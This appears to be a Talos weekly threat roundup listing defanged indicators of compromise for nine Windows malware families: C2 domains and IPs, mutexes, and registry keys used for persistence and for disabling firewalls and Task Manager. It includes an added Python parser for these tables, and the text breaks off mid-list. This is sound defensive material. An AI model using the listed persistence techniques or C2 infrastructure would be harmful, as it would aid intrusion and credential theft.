Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 23 and April 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
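As an added illustration that is not part of the Talos post, the Python below parses IOC tables laid out the way the Threat Breakdown sections below are (a threat heading, a sample count, fused category headers, one indicator and its occurrence count per row, registry rows split across "Value Name:" lines), refangs the indicators, and then computes per-threat prevalence and cross-threat overlap, which is what makes a lone hit on a shared or low-count indicator weak evidence. The embedded sample is a trimmed copy of a few rows from this roundup's own tables; the heading and header-prefix matching are assumptions about that layout.

```python
"""Parse the roundup's flattened IOC tables, refang the indicators, and rank
them by prevalence and cross-threat overlap."""
import re
from collections import defaultdict

SAMPLE_COUNT_RE = re.compile(r"IOCs collected from dynamic analysis of (\d+) samples")
# Category headers as they appear on the page, possibly fused with "Occurrences".
CATEGORY_PREFIXES = ("Registry Keys", "Mutexes", "IP Addresses", "Domain Names",
                     "Files and or directories")
ROW_RE = re.compile(r"^(?P<ioc>.+?)\s+(?P<count>\d+)$")


def refang(ioc: str) -> str:
    """Turn the page's defanged form (172[.]67[.]188[.]154) back into a usable value."""
    return ioc.replace("[.]", ".")


def parse_roundup(text: str) -> dict:
    """Return {threat: {"samples": int, "iocs": [(category, ioc, count), ...]}}.

    Assumption: every line beginning with "Win." is a threat heading, as in the
    Threat Breakdown section of this roundup."""
    threats, current, category, pending = {}, None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("*See JSON"):
            continue
        if line.startswith("Win."):
            current = threats[line] = {"samples": 0, "iocs": []}
            category = pending = None
            continue
        m = SAMPLE_COUNT_RE.search(line)
        if m:
            current["samples"] = int(m.group(1))
            continue
        if line.startswith(CATEGORY_PREFIXES):
            category = (line.split(" contacted")[0].split(" created")[0]
                        .replace("Occurrences", "").rstrip(" |"))
            pending = None
            continue
        if category is None:
            continue
        if line.startswith("Value Name:") and pending:   # registry row, second line
            pending = f"{pending} :: {line}"
        elif line.isdigit() and pending:                  # registry row, count line
            current["iocs"].append((category, refang(pending), int(line)))
            pending = None
        else:
            m = ROW_RE.match(line)
            if m:
                current["iocs"].append((category, refang(m["ioc"]), int(m["count"])))
            else:
                pending = line                            # registry key awaiting its count
    return threats


def prevalence(threats: dict, threat: str) -> list:
    """Indicators of one threat, sorted by the share of its samples that exhibited them."""
    entry = threats[threat]
    rows = [(cat, ioc, count / entry["samples"]) for cat, ioc, count in entry["iocs"]]
    return sorted(rows, key=lambda r: r[2], reverse=True)


def shared_indicators(threats: dict) -> dict:
    """Indicators that appear under more than one threat family (weak on their own)."""
    seen = defaultdict(set)
    for name, entry in threats.items():
        for _, ioc, _ in entry["iocs"]:
            seen[ioc].add(name)
    return {ioc: names for ioc, names in seen.items() if len(names) > 1}


# Trimmed copy of rows from this roundup's own tables (not the full lists).
SAMPLE_TABLES = r"""
Win.Packed.LokiBot-9853576-0
IOCs collected from dynamic analysis of 16 samples
MutexesOccurrences
3749282D282E1E80C56CAE5A 4
9DAA44F7C7955D46445DC99B 4
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
checkip[.]dyndns[.]com 3
freegeoip[.]app 3
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 16

Win.Malware.Razy-9855433-0
IOCs collected from dynamic analysis of 29 samples
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 28
aporasal[.]net 28

Win.Dropper.DarkComet-9853582-1
IOCs collected from dynamic analysis of 27 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
20

Win.Dropper.NetWire-9853730-0
IOCs collected from dynamic analysis of 16 samples
MutexesOccurrences
3749282D282E1E80C56CAE5A 2
9DAA44F7C7955D46445DC99B 2
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
cdn[.]discordapp[.]com 11
"""

if __name__ == "__main__":
    parsed = parse_roundup(SAMPLE_TABLES)
    for ioc, families in shared_indicators(parsed).items():
        print(f"shared across {len(families)} families: {ioc}")
    for cat, ioc, share in prevalence(parsed, "Win.Packed.LokiBot-9853576-0")[:3]:
        print(f"{share:.0%} of LokiBot samples: [{cat}] {ioc}")
```

In this sample the two mutexes LokiBot and NetWire have in common surface as shared indicators, while the CLR usage log is seen in every LokiBot sample yet is also an artifact any .NET binary leaves behind.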

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Packed.LokiBot-9853576-0 | Packed | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Malware.Razy-9855433-0 | Malware | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Dropper.DarkComet-9853582-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.Dridex-9853590-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Malware.CopperStealer-9853616-1 | Malware | CopperStealer is malware that typically spreads via cracked file downloads and attempts to steal credentials and session cookies from installed web browsers.
Win.Dropper.NetWire-9853730-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9855176-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.njRAT-9854103-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.ZeroAccess-9854205-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.

Threat Breakdown

Win.Packed.LokiBot-9853576-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Mutexes | Occurrences
3749282D282E1E80C56CAE5A 4
9DAA44F7C7955D46445DC99B 4
rZbnabpXxgObkzcenAGtuiaXOgf 1
wzaowyXpGLWUa 1
NnRTijRelUgAUagsEt 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
172[.]67[.]188[.]154 3
162[.]88[.]193[.]70 2
104[.]21[.]19[.]200 2
193[.]233[.]75[.]49 2
216[.]146[.]43[.]70 1
131[.]186[.]113[.]70 1
35[.]247[.]234[.]230 1
185[.]209[.]1[.]112 1
104[.]168[.]140[.]79 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
checkip[.]dyndns[.]com 3
checkip[.]dyndns[.]org 3
freegeoip[.]app 3
gccorps[.]com 1
issth[.]com 1
amrp[.]tw 1
Files and or directories created | Occurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 16
%System32%\Tasks\Updates 7
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 7
%APPDATA%\D282E1 4
%APPDATA%\D282E1\1E80C5.lck 4
%APPDATA%\7C7955\5D4644.lck 4
%APPDATA%\.exe 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\.url 2
%APPDATA%\ipkjBIJaVvWZ.exe 1
%APPDATA%\EvKldzxyPYTK.exe 1
%APPDATA%\assVVwyaGZOmx.exe 1
%APPDATA%\BsDanabug.exe 1
%System32%\Tasks\Updates\BsDanabug 1
%System32%\Tasks\Updates\assVVwyaGZOmx 1
%System32%\Tasks\Updates\ipkjBIJaVvWZ 1
%APPDATA%\BxQVnnbwVJ.exe 1
%APPDATA%\IXLTwKJY.exe 1
%System32%\Tasks\Updates\IXLTwKJY 1
%System32%\Tasks\Updates\EvKldzxyPYTK 1
%System32%\Tasks\Updates\BxQVnnbwVJ 1
%APPDATA%\waVSRZEHg.exe 1
%System32%\Tasks\Updates\waVSRZEHg 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Razy-9855433-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
104[.]21[.]38[.]216 17
104[.]23[.]98[.]190 15
172[.]64[.]101[.]8 15
104[.]23[.]99[.]190 13
172[.]64[.]100[.]8 13
172[.]67[.]139[.]81 11
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
pastebin[.]com 28
q[.]gs 28
aporasal[.]net 28
Files and or directories created | Occurrences
%System32%\Tasks\iuqcNinke7c5 28
<malware cwd>\old_<malware exe name> (copy) 6
\TEMP\9CqAB.xml 1
\TEMP\GseMbDFK.xml 1
\TEMP\HhDkUNSu.xml 1
\TEMP\6kcQKmwE.xml 1
\TEMP\6628794ad55c12000753c70fa6a69d76.exe 1
\TEMP\uzXTmkn.xml 1
\TEMP\sGC59QCZS.xml 1
\TEMP\jpptbs6K.xml 1
\TEMP\tipLr8YLi.xml 1
\TEMP\RdPh15.xml 1
\TEMP\8OYCaQaX.xml 1
\TEMP\xpT6j.xml 1
\TEMP\aKA1pf.xml 1
\TEMP\Hwllblz.xml 1
\TEMP\5wMFmB.xml 1
\TEMP\GnqLf85.xml 1
\TEMP\TyNzwmv.xml 1
\TEMP\JZ8hCl1qL.xml 1
\TEMP\h8bLuEvoT.xml 1
\TEMP\MsC5uav.xml 1
\TEMP\EGmw9.xml 1
\TEMP\0j0eqW97p.xml 1
\TEMP\x49QP.xml 1

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.DarkComet-9853582-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: DarkComet RAT
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: csrss
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: windows
1
Mutexes | Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 15
DCPERSFWBP 5
DCMIN_MUTEX-TDNJD9M 5
DCMIN_MUTEX-TWA8QTT 2
DCMIN_MUTEX-Q1AM59Z 1
Global\167abac1-a33b-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
78[.]159[.]135[.]230 1
3[.]223[.]115[.]185 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
alioo[.]no-ip[.]biz 3
hdredirect-lb7-5a03e1c2772e1c9c[.]elb[.]us-east-1[.]amazonaws[.]com 1
iamback010[.]no-ip[.]biz 1
khaledreal[.]zapto[.]org 1
jack-point[.]ddns01[.]com 1
realworld[.]no-ip[.]org 1
jack-point[.]ddns[.]net 1
dr[.]no-ip[.]biz 1
Files and or directories created | Occurrences
%APPDATA%\dclogs 22
%HOMEPATH%\Documents\MSDCSC 7
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 7
%HOMEPATH%\Documents\DCSCMIN 7
%HOMEPATH%\Documents\DCSCMIN\IMDCSC.exe 7
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC 4
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\msdcsc.exe 4
%System32%\drivers\etc\hosts 1
%APPDATA%\MSDCSC 1
%APPDATA%\MSDCSC\msdcsc.exe 1
%SystemRoot%\SysWOW64\DCSCMIN 1
%SystemRoot%\SysWOW64\DCSCMIN\IMDCSC.exe 1
%System32%\DCSCMIN\IMDCSC.exe 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9853590-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
12
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 12
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
172[.]217[.]6[.]206 12
104[.]23[.]99[.]190 8
104[.]23[.]98[.]190 4
173[.]194[.]175[.]113 3
173[.]194[.]175[.]100/31 3
173[.]194[.]175[.]138/31 3
205[.]185[.]216[.]42 2
173[.]194[.]175[.]102 2
23[.]3[.]13[.]160 2
72[.]21[.]81[.]240 1
23[.]3[.]13[.]88 1
23[.]3[.]13[.]153 1
23[.]3[.]13[.]155 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
pastebin[.]com 12
w[.]google[.]com 12
www3[.]l[.]google[.]com 11
cds[.]d2s7q6s2[.]hwcdn[.]net 2
www[.]p6zkflkcvi[.]com 1
www[.]lutzv5kbv7[.]com 1
www[.]hpcopclesw[.]com 1
www[.]7nco416xfq[.]com 1
www[.]re7zlg8f4v[.]com 1
www[.]ox7jojjedp[.]com 1
www[.]kcx9t5lh2a[.]com 1
www[.]m2nlbyfhax[.]com 1
www[.]yhqc0c11ri[.]com 1
www[.]rnqrihkgzw[.]com 1
www[.]t9ebjn8jqh[.]com 1
www[.]1qoty6oaol[.]com 1
www[.]miatxpca3u[.]com 1
www[.]sobofskydd[.]com 1
www[.]x2pgp5wjr0[.]com 1
www[.]fp2h4lxn8h[.]com 1
www[.]6a9zdmescj[.]com 1
www[.]duualbwpuh[.]com 1
www[.]tbaxjyizbw[.]com 1
www[.]smm8b80u3p[.]com 1
www[.]flkxkpm8v1[.]com 1

*See JSON for more IOCs

Files and or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 11

File Hashes


Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.CopperStealer-9853616-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\A0B923820DCC509A 16
<HKLM>\SOFTWARE\MICROSOFT\9D4C2F636F067F89 16
<HKLM>\SOFTWARE\MICROSOFT\6BF27B46191C0E02 16
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\6C0CE2DD0584C47CAC18839F14055F19FA270CDD
Value Name: Blob
16
Mutexes | Occurrences
Global\exist_sign_task_Hello001 16
Global\exist_sign_task_Hello002 16
Global\exist_sign__install_r3 16
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
75c104b52c9869a5[.]xyz 15
f059009a45a12d8a[.]xyz 1
Files and or directories created | Occurrences
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\extensions.json 16
%LOCALAPPDATA%\crx.json 16
%TEMP%\download 16
%TEMP%\download\MiniThunderPlatform.exe 16
%TEMP%\download\ThunderFW.exe 16
%TEMP%\download\atl71.dll 16
%TEMP%\download\dl_peer_id.dll 16
%TEMP%\download\download_engine.dll 16
%TEMP%\download\msvcp71.dll 16
%TEMP%\download\msvcr71.dll 16
%TEMP%\download\zlib1.dll 16
%TEMP%\xldl.dat 16
%TEMP%\xldl.dll 16
%APPDATA%\Microsoft\Windows\4b5ce2fe28308fd9 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\.metadata-v2 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295\.metadata-v2 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295\idb 16

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.NetWire-9853730-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\NETWIRE 1
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5 1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5
Value Name: licence
1
<HKCU>\SOFTWARE\STORE-CZWI6V 1
<HKCU>\SOFTWARE\STORE-CZWI6V
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5
Value Name: exepath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Bpmui
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Gtxzx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\5AW83665KL 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Imvkm
1
<HKCU>\SOFTWARE\STORE-CZWI6V
Value Name: exepath
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Dljiq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Sewfk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Yklwx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Xcrio
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Zfmlr
1
Mutexes | Occurrences
Global\<random guid> 7
3749282D282E1E80C56CAE5A 2
Remcos_Mutex_Inj 2
9DAA44F7C7955D46445DC99B 2
- 1
microsoftwndddows98-739KD5 1
store-CZWI6V 1
a0ca6e8ac2f9de4d1d0ed1213f166cbc 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
162[.]159[.]134[.]233 7
162[.]159[.]135[.]233 5
162[.]159[.]130[.]233 3
162[.]159[.]129[.]233 3
162[.]214[.]156[.]4 2
162[.]159[.]133[.]233 1
89[.]249[.]74[.]213 1
37[.]139[.]64[.]106 1
172[.]67[.]217[.]241 1
104[.]21[.]70[.]22 1
194[.]32[.]146[.]143 1
172[.]67[.]214[.]105 1
103[.]150[.]8[.]54 1
142[.]44[.]252[.]19 1
185[.]236[.]203[.]123 1
94[.]103[.]80[.]254 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
cdn[.]discordapp[.]com 11
harmonyidtech[.]com 2
style[.]ptbagasps[.]co[.]id 1
xchilogs[.]duckdns[.]org 1
salonirang[.]duckdns[.]org 1
taker2[.]xyz 1
greenbazaar[.]xyz 1
dataprotectcdn[.]datarecognitionpath[.]xyz 1
Files and or directories created | Occurrences
%PUBLIC%\Libraries\temp 16
%APPDATA%\D282E1 2
%APPDATA%\D282E1\1E80C5.lck 2
%APPDATA%\7C7955\5D4644.lck 2
%APPDATA%\7C7955\5D4644.exe (copy) 2
%ProgramFiles%\Microsoft DN1 1
%LOCALAPPDATA%\Microsoft Vision 1
%APPDATA%\microsoftwndddows98\logs.dat 1
%APPDATA%\microsoftwndddows98 1
%APPDATA%\store 1
%APPDATA%\store\olok.ocx 1
%PUBLIC%\Libraries\Imvkm (copy) 1
%PUBLIC%\Libraries\Imvkmpoe.exe 1
%PUBLIC%\Libraries\mkvmI.url 1
%PUBLIC%\Libraries\Xcrio (copy) 1
%PUBLIC%\Libraries\Xcriopoe.exe 1
%PUBLIC%\Libraries\oircX.url 1
%PUBLIC%\Libraries\Zfmlr (copy) 1
%PUBLIC%\Libraries\Zfmlrpoe.exe 1
%PUBLIC%\Libraries\rlmfZ.url 1
%PUBLIC%\Libraries\Dljiq (copy) 1
%PUBLIC%\Libraries\Dljiqpoe.exe 1
%PUBLIC%\Libraries\qijlD.url 1
%PUBLIC%\Libraries\Bpmuipoe.exe 1
%PUBLIC%\Libraries\iumpB.url 1

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Remcos-9855176-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC 10
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC
Value Name: EXEpath
10
Mutexes | Occurrences
Remcos_Mutex_Inj 10
remcos_voxcyiginc 10
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
urchamadi[.]ddns[.]net 10
Files and or directories created | Occurrences
%APPDATA%\remcos 10
%APPDATA%\remcos\logs.dat 10
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\hgftvcxzwsiklon.vbe 10
%APPDATA%\hgftvcxzwsiklon.exe 10

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.njRAT-9854103-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys | Occurrences
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
21
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
21
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\156 21
<HKCU>\SOFTWARE\A031CF151DE510A7D18304B0D730B67A 6
<HKCU>\SOFTWARE\A031CF151DE510A7D18304B0D730B67A
Value Name: [kl]
6
<HKCU>\SOFTWARE\B4B2636F8E4E4ACE1CB19CBBFEB89139 2
<HKCU>\SOFTWARE\B4B2636F8E4E4ACE1CB19CBBFEB89139
Value Name: [kl]
2
<HKCU>\SOFTWARE\79C27992CCE9D482215343622444A84A 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 79c27992cce9d482215343622444a84a
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 79c27992cce9d482215343622444a84a
2
<HKCU>\SOFTWARE\79C27992CCE9D482215343622444A84A
Value Name: [kl]
2
<HKCU>\SOFTWARE\279F6960ED84A752570ACA7FB2DC1552
Value Name: [kl]
1
<HKCU>\SOFTWARE\4C7D72454E30A17C251E74001EC3D3ED
Value Name: [kl]
1
<HKCU>\SOFTWARE\279F6960ED84A752570ACA7FB2DC1552 1
<HKCU>\SOFTWARE\4C7D72454E30A17C251E74001EC3D3ED 1
<HKCU>\SOFTWARE\145D2F706F955EACF809A9B730E8FEEA 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 145d2f706f955eacf809a9b730e8feea
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 145d2f706f955eacf809a9b730e8feea
1
<HKCU>\SOFTWARE\145D2F706F955EACF809A9B730E8FEEA
Value Name: [kl]
1
<HKCU>\SOFTWARE\CE01C704D96A4BEAD8B026DD8A03AC57 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ce01c704d96a4bead8b026dd8a03ac57
